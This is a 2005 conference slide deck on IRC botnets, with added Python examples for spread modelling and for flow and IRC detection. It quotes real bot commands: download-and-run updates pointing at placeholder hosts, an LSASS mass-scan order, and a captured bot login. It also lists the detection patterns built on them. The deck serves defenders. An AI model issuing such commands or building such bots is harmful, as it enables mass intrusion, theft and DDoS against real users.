BOTNETS

Randy Marchany
marchany@vt.edu
VA Tech IT Security Lab
VASCAN 2005

VASCAN 2005 Copyright Marchany 1


What are Botnets?
- An IRC based, command and control network of compromised hosts (bots)
- A bot is a client program that runs in the background of a compromised host
  - Watches for certain strings on an IRC channel
  - These are encoded commands for the bot
- Purpose
  - DoS, ID theft, phishing, keylogging, spam
  - Fun AND profit

Why IRC?
- IRC servers are:
  - freely available
  - easy to manage
  - easy to subvert
- Attackers have experience with IRC
- IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts

Nothing New
- Command and controllers based on DDoS and military models
- C&C functions mostly centralized
  - IRC servers
  - Well-known DNS names
- CERT 10/2001 “Trends in DoS” paper discussed this concept

How bad is the problem?
- Symantec identified a 400K node botnet
- A netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections. Phatbot harvests MyDoom and Bagle infected machines. Phatbot is a bot.

Spreading Problem
- Spreading mechanism is a leading cause of background noise
- Ports 445, 135, 139, 137 accounted for 80% of traffic captured by the German Honeynet Project
- Other ports
  - 2745 – Bagle backdoor
  - 3127 – MyDoom backdoor
  - 3410 – Optix trojan backdoor
  - 5000 – UPnP vulnerability

Spread Model – Scan Rate: 1/Minute
- 575K hosts scanned
- Worms scan entire IP address space
- 60% vulnerable systems online
- Infects all systems within 20 weeks

Spread Model – Scan Rate: 1/day
- 35K hosts on VT net
- Scan rate: 1/day
- All hosts vulnerable
- Total infection after 25 days

Spread Model – Scan Rate: 1/hr
- 35K hosts on VT net
- Scan rate: 1/hr
- All hosts vulnerable
- Total infection after 25 hours

Spread Models – Super Fast
- Spread rate: 4k scans/sec
- 35K hosts on VT net
- All hosts vulnerable
- Total infection after 4 msec
- Random scan pattern
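
The four spread-model slides above share one mechanism: every infected host probes random addresses, and each probe that lands on a clean vulnerable host adds one more scanner. The following added example (not the deck's own model or code) works that through as a discrete logistic recurrence; the host counts and scan rates are the slides', while the address spaces (the VT net taken as a /16, the full IPv4 space for the Internet case) are assumptions. It lands in the same order of magnitude as the slides' figures (weeks for the Internet case, tens of days or hours on campus, seconds at 4k scans/sec).

```python
# Expected-value model of a random-scanning worm: a discrete form of the
# logistic model common in the worm literature. Each infected host sends
# scans_per_step probes per time step at uniformly random addresses, and a
# probe that lands on a vulnerable, still-clean host infects it.


def steps_to_infect(vulnerable, address_space, scans_per_step,
                    target=0.99, max_steps=10_000_000):
    """Time steps until `target` of the vulnerable hosts are infected.

    The result is in whatever time unit scans_per_step uses (per minute,
    per day, per second ...). address_space is the number of addresses a
    probe can land on, which is not the same as the number of hosts.
    """
    infected = 1.0                       # patient zero
    goal = target * vulnerable
    for step in range(1, max_steps + 1):
        # A probe hits a clean vulnerable host with probability (V - I) / A.
        hit_prob = (vulnerable - infected) / address_space
        infected = min(vulnerable,
                       infected + infected * scans_per_step * hit_prob)
        if infected >= goal:
            return step
    raise RuntimeError("target not reached within max_steps")


def spread_table():
    """Re-run the deck's four scenarios; the address spaces are assumptions."""
    campus_hosts, campus_space = 35_000, 2 ** 16       # VT net taken as a /16
    internet_vuln, internet_space = 575_000 * 0.60, 2 ** 32
    minutes_per_week = 60 * 24 * 7
    return {
        "internet, 1 scan/min (weeks)":
            steps_to_infect(internet_vuln, internet_space, 1) / minutes_per_week,
        "campus, 1 scan/day (days)": steps_to_infect(campus_hosts, campus_space, 1),
        "campus, 1 scan/hr (hours)": steps_to_infect(campus_hosts, campus_space, 1),
        "campus, 4000 scans/sec (seconds)":
            steps_to_infect(campus_hosts, campus_space, 4000),
    }


if __name__ == "__main__":
    for scenario, value in spread_table().items():
        print(f"{scenario}: {value:.1f}")
```

The 1/day and 1/hr campus rows produce the same step count because only the time unit differs; the model makes no allowance for patching or host churn, which is why it is a lower bound on real spread time.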

Botnet Uses
- DDoS
- Spam
- Sniffing traffic
- Keylogging
- Installing advertisement add-ons and Browser Helper Objects (BHOs)
- Manipulating online polls/games
- Mass ID theft

Botnet Clients
- Agobot/Phatbot/Forbot/XtremBot
  - Written in C++, source under the GPL
  - Modular structure allows expansion of commands and scanning abilities
  - Uses libpcap and Perl Compatible Regular Expressions (PCRE) to sniff traffic
  - Uses NTFS Alternate Data Streams (ADS)
  - Offers rootkit functions like process hiding
  - Detects debuggers (SoftICE, OllyDbg) and VMware
  - Can use a C&C protocol other than IRC

Botnet Clients
- SDBot/RBot/UrBot/URXBot
  - Most active currently
  - Written in poor C and GPL’d
  - Popular with attackers
- mIRC-based bots, GT-Bot
  - GT = Global Threat, the common name for all mIRC-scripted bots
  - Launch an mIRC chat client with a set of scripts and other binaries
  - Scripts have the .mrc extension

Botnet Clients
- DSNX bots
  - Written in C++ with a plugin I/F
  - http://www.securityforest.com/wiki/index.php/Category:Maintaining_Access
- Q8 bots
  - Very small – 926 lines of C
  - Written for Linux/Unix
- Kaiten
  - Written for Linux/Unix
  - Weak user authentication – easy to hijack

Bot Attack Strategy
- Recruitment of the agent network
  - Finding vulnerable systems
  - Breaking into vulnerable systems
    - Protocol attack
    - Middleware attack
    - Application or resource attack
- Controlling the agent network
  - Direct, indirect commands
  - Updating malware
  - Unwitting agents

Finding Vulnerable Systems
- Blended threat scanning
  - Program(s) that provide command & control using IRC bots
  - IRC commands tell the bot (e.g. Power) to do a netblock scan
  - Bot builds a list of vulnerable hosts and informs the attacker via the botnet
  - Attacker gets the file and adds it to a master list

Scanning for recruits

[Figure: scanning for recruits. Black – C&C; Red – scan info]

Malware Propagation
- Central repository
  - Malware sits on an FTP/WWW server
  - Victim downloads code from there
  - Trinoo, Shaft, W32/Leaves, W32/SoBig
- Back-chaining (pull)
  - Malware transferred from victim to next
  - Exploit, copy code, repeat with next host
- Push or forward
  - Exploit contains the malware so no copy

How they work
- Exploit host
  - Use TFTP, FTP, HTTP or CSend (IRC extension) to transfer itself to the victim
- Binary starts and attempts to connect to the hard-coded master IRC server
  - A dynamic DNS name can be used to allow the server to move around
- Bot tries to join master’s channel
  - Sometimes password protected

How they work

<- :irc1.XXXXXX.XXX NOTICE AUTH :*** looking up your Hostname
<- :irc1.XXXXXX.XXX NOTICE AUTH :*** Found your hostname
-> PASS secretserverpass
-> NICK [urX]-700159
-> USER mltfvt 0 0 :mltfvt
<- :irc1.XXXXXX.XXX NOTICE [urX]-700159 :*** if you are having problems connecting due
<- PING :ED322722
-> PONG :ED322722
<- :irc.XXXXXX.XXX 001 [urX]-700159 :Welcome to irc1.XXXXXX.XXX IRC Network [urX]

How they work
- Server accepts the bot as a client and sends:
  - RPL_ISUPPORT
    - What features the server supports
  - RPL_MOTDSTART
  - RPL_MOTD
  - RPL_ENDOFMOTD
  - ERR_NOMOTD
    - No MOTD available

How they work
- On RPL_ENDOFMOTD or ERR_NOMOTD
  - Bot tries to join master’s channel with the provided password
  - JOIN #foobar channelpassword
- Bot receives the channel topic and interprets it as a command
  - .advscan lsass 200 5 0 -r -s
  - Spread using the LSASS hole, 200 concurrent threads, delay 5 sec, random, silent scan

How they work
- “.http.update http://<server>/-mugenxu/rBot.exe c:\msys32awds.exe 1”
  - Download binary from www site and run it (parameter 1)
- If nothing, idle awaiting command
- Bot tells master on completion
- IRC server/daemon (IRCd) provides the channel’s user list

How they work
- Botnet controller authenticates to take control of bots
- Some bot commands
  - Search for sensitive info on bot’d hosts
  - DCC – sending these files to another
  - DDoS a victim
  - Enable keylogger and look for PayPal or eBay account info

Wait, we’re not dumb
- Only beginners start a botnet on a normal IRCd
  - Too obvious to spot
- 2 IRCd versions used for botnets
  - Unreal IRCd (www.unrealircd.com)
    - Cross platform, links Unix and Windows
  - ConferenceRoom (www.webmaster.com)
    - Cracked commercial IRCd
  - Microsoft ChatServer

Rogue IRC Servers
- Random ports used to evade IDS
- Disabled or booby-trapped commands
- Password protected servers
- Hidden or keyed channels
- Promoting a bot already running on a machine

Protecting the botnet
- Encrypted C&C channels
- Non-IRC based C&C
- IPv6 networks
- Distributed controllers

Rogue Clues
- High invisible-to-visible user ratio
- High user-to-channel ratio
- Server display name doesn’t match IP
- Suspicious nicks, topics, channel names
- Suspicious A RR(s) associated with DNS name

Shades of Rogue
- Some IRC nets are used for warez file trading
- Bots with backdoor FTP servers common
- XDCC used to serve files to clients
- Legit servers used for bot migration
- IRC ops are hesitant to stop the offenders

Spot the bot
- Since the bot tries to phone home, we can use this to our advantage
- Can use a Honeynet configuration
- Snort_inline for suspicious connections
  - “332”
  - “TOPIC”
  - “PRIVMSG”
  - “NOTICE”

Spot the bot
- Traffic spikes may indicate an incoming botnet
- Similar idle connections on multiple hosts may be bots
- Analogous nicks in a channel may be bots

Spot the bot

Welcome to irc.whitehouse.gov
Your host is h4x0r.ownz.j00
There are 9556 users and 9542 invisible on 1 server
5 : channels formed
1 : operators online
Channel    Users  Topic
#help      1
#oldbots   5      .download http://w4r3z.example.org/r00t.exe
End of /LIST

Spot the bot
- Keep netflow data
- Sink holes, dark space, bogon monitoring
- IDS, tap and scrubbing tools
- Remote triggered black holes
- Host quarantines

Spot the bot
- Rate limit uncommon protocols, ports
- Anti-spoof filters
- Ingress/egress filters for C&C traffic
- Cisco interactive flow monitor
  - show ip cache flow
- Flow tools
  - http://www.splintered.net/sw/flow-tools
- Nfdump – http://nfdump.sourceforge.net

Spot the bot
- Flow monitor inside the net, not just at the border
  - Resnet, adminet, research nets
- TCP dport 6667 flows to unlikely netblocks
- Single source to multi-destination dark space or short flows
- SYNs coupled with unreachables or RSTs
- TFTP flows
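
As an added example (not from the deck), three of the flow heuristics above applied to a handful of constructed flow records: IRC (dport 6667) to a netblock where no IRC server is expected, one source fanning out to many dark-space addresses, and TFTP flows. The expected IRC netblock, the dark-space prefix and the scan threshold are assumed local policy, not values from the deck.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records (src, dst, proto, dport); the addresses are RFC 5737
# documentation ranges standing in for campus hosts, not real indicators.
SAMPLE_FLOWS = [
    ("192.0.2.10", "198.51.100.5", "tcp", 6667),   # IRC to an unlikely netblock
    ("192.0.2.10", "203.0.113.1", "tcp", 445),     # one source, many dark-space dsts
    ("192.0.2.10", "203.0.113.2", "tcp", 445),
    ("192.0.2.10", "203.0.113.3", "tcp", 445),
    ("192.0.2.10", "203.0.113.4", "tcp", 445),
    ("192.0.2.10", "198.51.100.9", "udp", 69),     # TFTP pull of a payload
    ("192.0.2.20", "198.51.100.7", "tcp", 80),     # ordinary web traffic
    ("192.0.2.20", "192.0.2.77", "tcp", 6667),     # IRC to the campus IRC server
]

# Assumed local policy (not from the deck): where IRC connections are expected,
# which campus prefix is dark space, and how many dark targets make a scanner.
EXPECTED_IRC = [ipaddress.ip_network("192.0.2.64/26")]
DARK_SPACE = [ipaddress.ip_network("203.0.113.0/24")]
DARK_THRESHOLD = 3


def in_any(addr, nets):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in nets)


def analyse_flows(flows, dark_threshold=DARK_THRESHOLD):
    """Apply the deck's flow heuristics; returns {src: sorted list of reasons}."""
    findings = defaultdict(set)
    dark_targets = defaultdict(set)
    for src, dst, proto, dport in flows:
        if proto == "tcp" and dport == 6667 and not in_any(dst, EXPECTED_IRC):
            findings[src].add("irc-to-unlikely-netblock")
        if proto == "udp" and dport == 69:
            findings[src].add("tftp-flow")
        if in_any(dst, DARK_SPACE):
            dark_targets[src].add(dst)
    # A single source touching several dark addresses is a scanner, not a user.
    for src, dsts in dark_targets.items():
        if len(dsts) >= dark_threshold:
            findings[src].add("dark-space-scan")
    return {src: sorted(reasons) for src, reasons in findings.items()}
```

On real flow-tools or nfdump exports the same loop runs over the parsed records; the value of running it inside the net rather than at the border is that the dark-space fan-out from a residence-hall host never crosses the border at all.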

Spot the bot
- Idle, rhythmic IRC traffic (30/60/90 sec)
- TCP port 113 on Windows suggests a bot
- FTP on odd ports
- Common C&C strings
  - advscan lsass \d+ \d+ \d+(\-[a-z])+
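
An added example (not the deck's code) that applies the C&C string checks from the snort_inline slide and the “Common C&C strings” bullet above to constructed IRC lines modelled on the deck's transcripts, plus the 30/60/90 s rhythm check. Nicks, server names and URLs in the sample are placeholders; the deck's advscan pattern is loosened with `\s*` so it also matches the whitespace that precedes each flag in the observed command.

```python
import re

# Constructed sample traffic modelled on the deck's transcripts; nicks, server
# names and URLs are placeholders, not real indicators.
SAMPLE_LINES = [
    ":irc1.example.net 332 [urX]-700159 #foobar :.advscan lsass 200 5 0 -r -s",
    ":master!m@host PRIVMSG #foobar :.http.update http://c2.example/rBot.exe c:\\msys32awds.exe 1",
    ":irc1.example.net 332 alice #help :welcome, please be nice",
    ":alice!a@host PRIVMSG #help :anyone seen the lsass patch yet?",
]

# The four IRC commands the deck suggests watching for in snort_inline.
CC_COMMANDS = {"332", "TOPIC", "PRIVMSG", "NOTICE"}
# Deck pattern advscan lsass \d+ \d+ \d+(\-[a-z])+, with \s* allowed before each flag.
BOT_PATTERNS = {
    "advscan": re.compile(r"advscan lsass \d+ \d+ \d+(?:\s*-[a-z])+"),
    "update": re.compile(r"\.(?:http\.update|download)\s+https?://\S+"),
}

def parse_irc(line):
    """Split one IRC line into (prefix, command, params, trailing) per RFC 1459."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else None)

def scan_lines(lines):
    """Return one alert per line whose payload carries a known bot command."""
    alerts = []
    for line in lines:
        prefix, command, params, trailing = parse_irc(line)
        if command not in CC_COMMANDS or not trailing:
            continue
        channel = next((p for p in params if p.startswith("#")), None)
        for rule, pattern in BOT_PATTERNS.items():
            if pattern.search(trailing):
                alerts.append({"rule": rule, "command": command,
                               "channel": channel, "source": prefix})
                break
    return alerts

def is_rhythmic(timestamps, beats=(30, 60, 90), tolerance=2.0):
    """True when message gaps cluster on the deck's 30/60/90 s idle beats."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    hits = sum(any(abs(g - beat) <= tolerance for beat in beats) for g in gaps)
    return len(gaps) >= 3 and hits / len(gaps) >= 0.8
```

The 332 numeric matters because the topic is delivered on join, so a host that receives a command-shaped topic has already been recruited; the rhythm check catches bots that are idle and therefore never trip the string rules.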

Sample Windows XP Bot catcher
- ipseccmd -w REG -p botcatcher -r TCP445 -f 0=*:445:TCP -n BLOCK
- ipseccmd -w REG -p botcatcher -r TCP135 -f 0=*:135:TCP -n BLOCK
- ipseccmd -w REG -p botcatcher -r TCP139 -f 0=*:139:TCP -n BLOCK
- ipseccmd -w REG -p botcatcher -r ICMP -f 0=*::ICMP -n BLOCK
- ipseccmd -w REG -p botcatcher -r HTTP -f 0=*:80:TCP -n BLOCK

Observing Botnets
- Reconnect into the botnet
  - Set up irssi (console-based IRC client)
  - Disable all auto-response triggering commands
  - Limit replies to the “CTCP VERSION” command
  - CTCP – Client-To-Client Protocol
- Very TIME CONSUMING to do

Lessons Learned
- Honeynet project tracked 100 botnets in a 4 month period
- Currently tracking 35 active botnets
- Honeynet saw 226585 unique IP addresses joining at least 1 botnet
- Honeynet monitored up to 50K host botnets
- Honeynet observed 226 DDoS attacks against 99 targets from 11/1/04-1/31/05

Lessons Learned
- “.advscan lsass 150 5 0 -r -s” and similar commands were the most common observed in botnets
- “.getcdkeys” used to request a list of CD-keys for Windows or games
- Frequent updates of botnets

References
- John Kristoff (jtk@northwestern.edu), “BOTNETS”, NANOG32 presentation
- “Know your Enemy: Tracking Botnets”, Lance Spitzner, http://www.honeynet.org/papers/bots
- http://www.securityforest.com/wiki/index.php/Category:Maintaining_Access
